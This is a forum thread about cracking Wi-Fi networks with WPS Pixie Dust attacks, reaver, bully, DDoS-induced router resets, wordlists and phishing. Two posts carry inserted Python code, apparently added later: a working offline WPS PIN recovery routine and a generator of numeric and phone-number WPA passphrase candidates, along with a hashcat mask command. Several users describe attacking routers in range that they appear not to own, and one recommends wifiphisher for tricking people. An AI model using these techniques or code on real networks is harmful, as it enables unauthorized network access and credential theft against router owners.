
Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #551
    Senior Member
    Join Date
    Jul 2013
    Posts
    809
    To Paulnewman

    Outside of brute forcing a handshake or WPA phishing there are three (3) possibilities. Chances of success are SMALL, success may not be immediate, and these attacks may not work at all!

    Method One

    Some routers, when subjected to small amounts of DDoS, release WPS pins even though the WPS system is locked. You can test this vulnerability by using one of the VMR-MDK variants.

    Method Two

    Some routers reset their WPS pins to 12345670 and become open to WPS pin collection for short periods of time. You can run reaver or bully with the pin 12345670 in the command line and constantly attack the router for a long period of time (i.e. weeks). Better just run up varmacscan when your computer is idle and you may get lucky.

    Method Three

    Some routers reset after being subjected to heavy DDoSing. Mteams has not had much success with Method Three.
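
    The default PIN 12345670 in Method Two and the offline (Pixie Dust) attack this thread is about both come down to how a WPS PIN is built. The following is an added example in Python, not code from this post or from reaver, bully or VMR-MDK. It shows why 12345670 is a syntactically valid PIN (the 8th digit is a checksum over the first seven), and simulates the offline recovery of a PIN from the E-Hash1/E-Hash2 values an AP commits to in M3 when its E-S1/E-S2 nonces are all zero. AuthKey, PKE, PKR and the nonces are constructed test values; the all-zero nonce stands in for the weak-nonce condition the real attack depends on, and the second run shows that an AP with properly random nonces is not recoverable this way.

```python
"""WPS PIN checksum and an offline (Pixie-Dust-style) PIN recovery.

Added example, not code from the thread or from reaver/bully/VMR-MDK.
AuthKey, PKE, PKR and the nonces are constructed; zero E-S1/E-S2 models
the weak-nonce condition the offline attack depends on.
"""
import hashlib
import hmac


def wps_checksum(first7: int) -> int:
    """Check digit for a 7-digit WPS PIN prefix.

    Digits are weighted 3,1,3,1,... from the right; the check digit makes
    the weighted sum a multiple of 10 (so 1234567 -> 0, giving 12345670).
    """
    accum = 0
    while first7:
        accum += 3 * (first7 % 10)
        first7 //= 10
        accum += first7 % 10
        first7 //= 10
    return (10 - accum % 10) % 10


def wps_pin_from_prefix(prefix7: str) -> str:
    """Complete a 7-digit prefix into a full 8-digit PIN."""
    if len(prefix7) != 7 or not prefix7.isdigit():
        raise ValueError("prefix must be exactly 7 digits")
    return prefix7 + str(wps_checksum(int(prefix7)))


def wps_pin_valid(pin: str) -> bool:
    """True if an 8-digit PIN carries the right check digit."""
    return len(pin) == 8 and pin.isdigit() and wps_pin_from_prefix(pin[:7]) == pin


def _psk(auth_key: bytes, pin_half: str) -> bytes:
    # PSK1/PSK2: first 128 bits of HMAC-SHA256(AuthKey, ASCII half of the PIN)
    return hmac.new(auth_key, pin_half.encode(), hashlib.sha256).digest()[:16]


def _e_hash(auth_key: bytes, e_s: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    # E-Hash1/E-Hash2 = HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR), sent in M3
    return hmac.new(auth_key, e_s + psk + pke + pkr, hashlib.sha256).digest()


def enrollee_m3(auth_key: bytes, pin: str, e_s1: bytes, e_s2: bytes,
                pke: bytes, pkr: bytes) -> tuple[bytes, bytes]:
    """What the AP (enrollee) commits to in M3 for this PIN and these nonces."""
    return (_e_hash(auth_key, e_s1, _psk(auth_key, pin[:4]), pke, pkr),
            _e_hash(auth_key, e_s2, _psk(auth_key, pin[4:]), pke, pkr))


def pixie_recover(auth_key: bytes, e_hash1: bytes, e_hash2: bytes,
                  pke: bytes, pkr: bytes,
                  e_s1: bytes = bytes(16), e_s2: bytes = bytes(16)):
    """Recover the PIN offline from M3 when E-S1/E-S2 are known or guessable.

    The attacker plays the registrar, so it already holds AuthKey, PKE and PKR.
    The search is 10^4 for the first half plus 10^3 for the second (the 8th
    digit is the checksum): at most 11,000 HMACs and no further frames to the
    AP. Returns None when the guessed nonces are wrong (e.g. a random E-S1).
    """
    first = None
    for i in range(10_000):
        half = f"{i:04d}"
        if hmac.compare_digest(_e_hash(auth_key, e_s1, _psk(auth_key, half), pke, pkr), e_hash1):
            first = half
            break
    if first is None:
        return None
    for j in range(1_000):
        pin = wps_pin_from_prefix(first + f"{j:03d}")
        if hmac.compare_digest(_e_hash(auth_key, e_s2, _psk(auth_key, pin[4:]), pke, pkr), e_hash2):
            return pin
    return None


# Constructed values. In a real exchange AuthKey is derived from the DH secret
# and nonces of M1/M2, and PKE/PKR are the 1536-bit DH public keys from M1/M2.
AUTH_KEY = hashlib.sha256(b"constructed-authkey").digest()
PKE = bytes([0x11]) * 192
PKR = bytes([0x22]) * 192


def demo(pin: str = "12345670", weak_nonces: bool = True):
    """Simulate one M3 from an AP with the given PIN, then attack it offline."""
    e_s1 = bytes(16) if weak_nonces else bytes.fromhex("a1" * 16)
    e_s2 = bytes(16) if weak_nonces else bytes.fromhex("b2" * 16)
    eh1, eh2 = enrollee_m3(AUTH_KEY, pin, e_s1, e_s2, PKE, PKR)
    return pixie_recover(AUTH_KEY, eh1, eh2, PKE, PKR)


if __name__ == "__main__":
    print("12345670 valid:", wps_pin_valid("12345670"))   # True
    print("weak nonces   :", demo())                        # 12345670
    print("random nonces :", demo(weak_nonces=False))       # None
```

    The 10^4 + 10^3 split is also why an online attack against an unlocked AP needs at most 11,000 PIN attempts rather than 10^8, and why vendors lock WPS after a few failures. Real Pixie Dust tooling additionally has to guess how a given chipset generates E-S1/E-S2 (zero, or a weak PRNG seeded from the AP's own nonce), which is what the per-chipset mode selection in the tools is for.
    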

  2. #552
    Junior Member
    Join Date
    Jun 2016
    Posts
    4
    I tried using the suggested script VMR-MDK with standard parameters but I always get the same errors.
    On a first router:
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Entering recurring delay of 15 seconds
    On a second router:
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.

    In both cases the wash command shows that WPS is not locked but the system always tries the same PIN 12345670 and doesn't go forward....
    Last edited by Paulnewman; 2016-06-12 at 01:31 PM.

  3. #553
    Senior Member
    Join Date
    Jul 2013
    Posts
    809
    To Paulnewman

    If the WPS system is OPEN then VMR-MDK is not the tool of choice.

    MTeams suggests you use the command line first in most cases where the WPS system is open. Try both reaver and bully.

    There are many reasons why you cannot get reaver to collect pins. You might put the --wps option in airodump-ng, point it at your target by adding -c channel and --bssid, and see what information airodump-ng supplies.

    In the end you may have to resort to brute force by collecting a handshake. Remember approx 50% of the WPA keys are simple numeric strings 8 to 10 in length. Back when reaver was king MTeams collected hundreds of WPA keys and the 50% rule was obtained. In fact over half of these numeric strings were mobile telephone numbers, and a small number were landline numbers with and without the area code.

    MTeams
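
    The poster's observation that many recovered keys were 8- to 10-digit numbers, often phone numbers with or without an area code, translates directly into a targeted candidate list. The following is an added example in Python, not code from the thread or from crunch/aircrack-ng/hashcat. It generates all-digit candidates of a given length range (what `crunch 8 10 0123456789` produces) and phone-number-shaped candidates built from a list of area-code prefixes, and it sizes each keyspace before anything is written to disk. The area codes and subscriber length are placeholders, not a real numbering plan; the one check worth noting is that a number written without its area code only counts as a candidate if it still reaches the 8-character WPA minimum.

```python
"""Numeric WPA passphrase candidates (added example; not from the thread).

Area codes and subscriber lengths are placeholders, not a numbering plan.
"""
from itertools import islice, product
from typing import Iterable, Iterator

WPA_MIN_LEN = 8   # 802.11 passphrases are 8..63 characters; APs reject shorter ones
WPA_MAX_LEN = 63
DIGITS = "0123456789"


def numeric_keyspace(min_len: int = 8, max_len: int = 10) -> int:
    """How many all-digit passphrases exist between the two lengths."""
    return sum(10 ** n for n in range(min_len, max_len + 1))


def numeric_candidates(min_len: int = 8, max_len: int = 10) -> Iterator[str]:
    """Every all-digit string of the given lengths, shortest first.

    Same candidate set as `crunch 8 10 0123456789`; stream it into the
    cracker rather than writing 11.1 billion lines to disk.
    """
    for n in range(min_len, max_len + 1):
        for digits in product(DIGITS, repeat=n):
            yield "".join(digits)


def phone_candidates(area_codes: Iterable[str], subscriber_len: int = 7,
                     with_area_code: bool = True) -> Iterator[str]:
    """Phone-number-shaped candidates: <area code><subscriber number>.

    With with_area_code=False the prefix is empty, which models numbers people
    type without the area code. Those only qualify if they still reach
    WPA_MIN_LEN, so bare 7-digit local numbers are skipped outright.
    """
    prefixes = list(area_codes) if with_area_code else [""]
    for prefix in prefixes:
        if len(prefix) + subscriber_len < WPA_MIN_LEN:
            continue  # the AP could never have accepted this as a passphrase
        for digits in product(DIGITS, repeat=subscriber_len):
            yield prefix + "".join(digits)


def phone_keyspace(area_codes: Iterable[str], subscriber_len: int = 7,
                   with_area_code: bool = True) -> int:
    """Candidate count for phone_candidates() with the same arguments."""
    prefixes = list(area_codes) if with_area_code else [""]
    return sum(10 ** subscriber_len for p in prefixes
               if len(p) + subscriber_len >= WPA_MIN_LEN)


def sample(candidates: Iterator[str], n: int) -> list[str]:
    """First n candidates, for inspection or a quick smoke test."""
    return list(islice(candidates, n))


def write_wordlist(path: str, candidates: Iterable[str]) -> int:
    """Write candidates one per line (the format aircrack-ng -w and hashcat read)."""
    count = 0
    with open(path, "w") as fh:
        for cand in candidates:
            fh.write(cand + "\n")
            count += 1
    return count


if __name__ == "__main__":
    print(numeric_keyspace())                                   # 11100000000
    print(sample(phone_candidates(["555", "212"]), 3))
    print(phone_keyspace(["555"], 7, with_area_code=False))     # 0: too short for WPA
```

    For the plain numeric case a mask attack avoids the file entirely, e.g. hashcat mode 22000 with `-a 3 ?d?d?d?d?d?d?d?d?d?d --increment --increment-min 8`; the phone-shaped list is where a generated wordlist earns its keep, because a handful of local area codes cuts the search from 10^10 to a few times 10^7.
    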

  4. #554
    Junior Member
    Join Date
    Jun 2016
    Posts
    1
    Hi, I know it's a little off topic to Pixie's,
    is there any possible way to force the router to reset to its default factory setup? With a WPS-disabled router, or forcing WPS to enable?

    tried cracking AP with dictionary attack but no luck..

    thanks in advance!
    Last edited by tomodachimo; 2016-06-20 at 08:18 AM.

  5. #555
    Junior Member
    Join Date
    May 2015
    Posts
    25
    To mmusket33

    I have a TP-Link router TL-WR740N; it seems like it is impossible to crack the WPS PIN.

    First I tried the Wifite Pixie Dust attack; within seconds it says WPS PIN not found.

    Tried reaver with a delay of 10-15 seconds; doesn't help, as the router still locks after a few wrong WPS PIN attempts.

    I tried the VMR-MDK script; for the first few seconds I get the M1 till M4 messages and then it says "WPS transaction failed, code 0x04".

    I tried the Varmacscan, no luck there either.

    So I want to know, is there a way to crack the PIN of locked WPS routers? Usually the routers lock automatically after a few failed PIN attempts?

    WPA handshake and cracking with a wordlist is about luck; it only works if the passphrase is in the wordlist.

    Note: I did crack the D-Link routers with Wifite (Pixie Dust) within seconds; works perfectly.

    It's just the new routers which are hard to crack.

    Running Kali 2.0 Sana all tools updated to the latest.

    Please help. Thanks in advance

  6. #556
    Junior Member
    Join Date
    May 2015
    Posts
    18
    To machx: I have the same problem with newer routers as well; almost all of those I have in range are pretty new and updated Technicolor routers, so not much luck there.
    But I have recently started to play with wifiphisher instead and have a lot of success with that tool.
    Before, I found it hard to believe that people are so naive and easy to trick, so I never bothered to test this way, but now I have changed my mind.
    Give it a try^^

  7. #557
    Junior Member
    Join Date
    May 2015
    Posts
    25
    To squash,

    I'll give it a try, thanks a lot, running out of luck; will keep it updated here after the test.

  8. #558
    Junior Member
    Join Date
    Apr 2015
    Posts
    28
    Quote Originally Posted by machx
    To mmusket33

    WPA handshake and cracking with a wordlist is about luck; it only works if the passphrase is in the wordlist.
    You can crack WPA with crunch.

  9. #559
    Junior Member
    Join Date
    May 2015
    Posts
    25
    I had my luck yesterday and I was able to crack one with a dictionary attack with rockyou.txt.
    Others were cracked with Pixie Dust using Wifite.
    The rest are still in progress.
    VMR-MDK, Revd3k-r3 and Varmacscan don't work, and no hope there.

    I'm also using the default WPS PIN of the router manufacturer and model. It works sometimes
    with the default PIN (-p on reaver).

    Still testing, will keep updated

  10. #560
    Junior Member
    Join Date
    Sep 2016
    Posts
    8

    Having the -K 1,2,3 arguments explained like this in the menu would be helpful.

    Quote Originally Posted by soxrok2212
    Just so you know, -K 1,2,3... Each number is for a different chipset. You have to look up which chipset the router uses and then use the corresponding -K 1,2,3 argument.
    I only started looking into all things wireless 2 weeks ago, and have been using -K 1 for all attacks because that is the only thing mentioned. If you put the number next to the chipset in the menu, that would be more intuitive for those who haven't read the full history of this post. I am going through it because I want to see the development from day dot to current, but most people I know don't want to do that amount of research before using tools.

    Awesome work, as a non-coder (hopefully I develop past script kiddie soon) I am in awe of you

    Apologies on posting halfway through reading the entire thread, I jumped the gun a bit.
    Last edited by vinneth; 2016-09-09 at 08:07 AM. Reason: failed to read properly :-)
